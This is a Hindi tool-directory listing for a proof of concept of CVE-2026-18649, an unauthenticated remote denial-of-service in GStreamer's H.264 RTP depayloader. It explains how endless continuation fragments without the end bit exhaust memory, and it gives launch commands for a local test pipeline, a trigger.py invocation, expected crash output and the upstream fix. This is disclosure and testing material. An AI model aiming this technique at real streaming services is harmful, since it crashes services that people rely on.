Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-18649 — CVE-2026-18649 के लिए प्रमाण-अवधारणा, जो GStreamer के H.264 RTP डिपेलोडर (rtph264depay) में एक रिमोट डिनायल-ऑफ-सर्विस भेद्यता है। | Kitploit
उपकरण/GitHubGitHub/0xsemizzz/cve-2026-18649
पेलोड जनरेशनभेद्यता विश्लेषणशोषणनेटवर्क सुरक्षा
GitHub0xsemizzz/cve-2026-18649

CVE-2026-18649

CVE-2026-18649 के लिए प्रमाण-अवधारणा, जो GStreamer के H.264 RTP डिपेलोडर (rtph264depay) में एक रिमोट डिनायल-ऑफ-सर्विस भेद्यता है।

रिपॉजिटरी देखें
131 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-18649 - GStreamer rtph264depay असीमित मेमोरी वृद्धि DoS

GStreamer के H.264 RTP depayloader (rtph264depay) में संसाधन समाप्ति भेद्यता के लिए अवधारणा का प्रमाण। यही पैटर्न rtph265depay को भी प्रभावित करता है।

यह क्या है

H.264 FU-A खंडित RTP पुनर्संयोजन के दौरान, प्रत्येक आने वाला खंड बिना किसी आकार सीमा के एक आंतरिक GstAdapter बफर में डाल दिया जाता है। एडेप्टर केवल तभी फ्लश होता है जब FU हेडर में अंत-खंड (E) बिट सेट होता है। एक दूरस्थ हमलावर एक मान्य प्रारंभ खंड भेजता है, फिर निरंतरता खंडों की एक अंतहीन धारा भेजता है जबकि E बिट कभी सेट नहीं करता। बफर तब तक बढ़ता रहता है जब तक प्रक्रिया की मेमोरी समाप्त नहीं हो जाती और वह क्रैश नहीं हो जाती।

  • दूरस्थ, किसी प्रमाणीकरण की आवश्यकता नहीं
  • केवल मान्य RTP पैकेट का उपयोग करता है, कोई विकृत डेटा नहीं
  • एक स्ट्रीम पर्याप्त है, कोई फ्लडिंग या कई कनेक्शन की आवश्यकता नहीं

CVE विवरण

  • CVE: CVE-2026-18649 (NVD)
  • CWE: CWE-770 (सीमा या थ्रॉटलिंग के बिना आवंटन)
  • CVSS: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
  • द्वारा खोजा गया: Yehia Ali Mohamed Ezzat (0xsemizzz)
  • पूर्ण विवरण: 0xsemizzz.vercel.app/projects/gstreamer-cve

    प्रभावित संस्करण

    अपस्ट्रीम फिक्स से पहले gst-plugins-good। 1.28.2 (Ubuntu 24.04) पर पुष्टि की गई।

    त्वरित आरंभ

    एक पाइपलाइन शुरू करें, फिर PoC चलाएं:

    root@kitploit:~
    gst-launch-1.0 udpsrc port=5036 buffer-size=4194304 \
      caps="application/x-rtp,media=video,payload=96,clock-rate=90000,encoding-name=H264" \
      ! rtph264depay ! fakesink &
    PID=$!
    python3 trigger.py 5036 $PID
    

    तेजी से क्रैश के लिए, मेमोरी सीमा जोड़ें:

    root@kitploit:~
    ulimit -v 262144   # 256 MB, process dies in about 12 seconds
    gst-launch-1.0 udpsrc port=5036 buffer-size=4194304 \
      caps="application/x-rtp,media=video,payload=96,clock-rate=90000,encoding-name=H264" \
      ! rtph264depay ! fakesink &
    python3 trigger.py 5036 $!
    

    अपेक्षित आउटपुट

    root@kitploit:~
    [*] port=5036  1 fragment every 0.5ms  (~2.8 MB/s)
    [*] monitoring VmData (heap), not RSS
    [*] target PID=12345  baseline VmData=26 MB
    
          5000 frags  ~     7 MB sent  |  VmData=35MB (+8MB)
         10000 frags  ~    13 MB sent  |  VmData=44MB (+17MB)
         15000 frags  ~    20 MB sent  |  VmData=53MB (+26MB)
         20000 frags  ~    27 MB sent  |  VmData=62MB (+35MB)
         25000 frags  ~    33 MB sent  |  VmData=71MB (+44MB)
         30000 frags  ~    40 MB sent  |  VmData=79MB (+53MB)
         ...
         DEAD
    

    समाधान

    rtph264depay और rtph265depay में एक max-reassembly-size गुण जोड़ा गया। अनुप्रयोगों को इसे एक उचित मान पर सेट करना चाहिए (वीडियो के लिए 16 MB सामान्य है)। पिछड़े संगतता के लिए डिफ़ॉल्ट 0 (असीमित) है।

    टूल डाउनलोड करें